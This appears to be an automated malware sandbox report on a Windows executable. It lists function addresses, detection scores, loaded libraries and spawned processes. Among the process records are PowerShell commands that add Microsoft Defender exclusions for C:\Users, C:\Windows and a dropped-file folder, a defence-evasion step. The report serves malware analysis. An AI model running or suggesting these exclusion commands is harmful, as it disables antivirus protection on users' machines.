Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040918115_2_00409181
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D25115_2_0040D251
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041123115_2_00411231
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040923115_2_00409231
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F2C115_2_0040F2C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004112D115_2_004112D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B2E115_2_0040B2E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044329115_2_00443291
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040935115_2_00409351
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044336115_2_00443361
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B37115_2_0040B371
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D30115_2_0040D301
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F31115_2_0043F311
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042B32115_2_0042B321
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D3C115_2_0042D3C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D3D115_2_0040D3D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041338115_2_00413381
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F3B115_2_0040F3B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044343115_2_00443431
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004434F115_2_004434F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F48115_2_0043F481
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004094A115_2_004094A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B4A115_2_0040B4A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041356115_2_00413561
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040956115_2_00409561
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D50115_2_0040D501
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041151115_2_00411511
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B5E115_2_0040B5E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F59115_2_0040F591
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F59115_2_0043F591
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044359115_2_00443591
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D5B115_2_0040D5B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F65115_2_0043F651
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044367115_2_00443671
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041360115_2_00413601
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041162115_2_00411621
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F63115_2_0040F631
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D6C115_2_0042D6C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D6E115_2_0040D6E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F6F115_2_0043F6F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B68115_2_0040B681
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042B69115_2_0042B691
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004096B115_2_004096B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041174115_2_00411741
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F74115_2_0040F741
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044374115_2_00443741
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041371115_2_00413711
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B7C115_2_0040B7C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F7E115_2_0043F7E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004437E115_2_004437E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F7F115_2_0040F7F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004097B115_2_004097B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D80115_2_0040D801
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F8C115_2_0040F8C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004098D115_2_004098D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F8D115_2_0043F8D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B8E115_2_0040B8E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D8F115_2_0040D8F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D8F115_2_0042D8F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041188115_2_00411881
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004438A115_2_004438A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041396115_2_00413961
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F97115_2_0043F971
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004119D115_2_004119D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004139F115_2_004139F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D9F115_2_0040D9F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004099F115_2_004099F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F98115_2_0040F981
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044398115_2_00443981
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411A7115_2_00411A71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BA0115_2_0040BA01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FA0115_2_0043FA01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042DA0115_2_0042DA01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042DAC115_2_0042DAC1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BAF115_2_0040BAF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409A8115_2_00409A81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FAA115_2_0043FAA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BAA115_2_0042BAA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00413B0115_2_00413B01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DB0115_2_0040DB01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411B3115_2_00411B31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411BD115_2_00411BD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DBD115_2_0040DBD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00413BE115_2_00413BE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BB8115_2_0040BB81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409BA115_2_00409BA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BBB115_2_0042BBB1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BC5115_2_0042BC51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411C7115_2_00411C71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BC7115_2_0040BC71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040FC3115_2_0040FC31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409CC115_2_00409CC1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DC8115_2_0040DC81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FC9115_2_0043FC91
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00413D1115_2_00413D11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BD1115_2_0040BD11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DD3115_2_0040DD31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FD3115_2_0043FD31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DDD115_2_0040DDD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FDD115_2_0043FDD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BDE115_2_0042BDE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409DF115_2_00409DF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00403D8115_2_00403D81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411D9115_2_00411D91
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BDB115_2_0040BDB1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FE6115_2_0043FE61
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411E3115_2_00411E31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BED115_2_0042BED1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BE8115_2_0040BE81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DE8115_2_0040DE81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00447F4F15_2_00447F4F
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BF7115_2_0040BF71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DFD115_2_0040DFD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409FA115_2_00409FA1
Source: Joe Sandbox View | Dropped File: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
Source: YYjRtxS70h.exe, 00000000.00000000.1867590904.0000000000952000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe | Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: classification engine | Classification label: mal84.evad.winEXE@19/24@4/5
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbsmnz2u.wnl.ps1
Source: YYjRtxS70h.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YYjRtxS70h.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YYjRtxS70h.exe | Virustotal: Detection: 62%
Source: YYjRtxS70h.exe | ReversingLabs: Detection: 65%
Source: unknown | Process created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe "C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe "C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
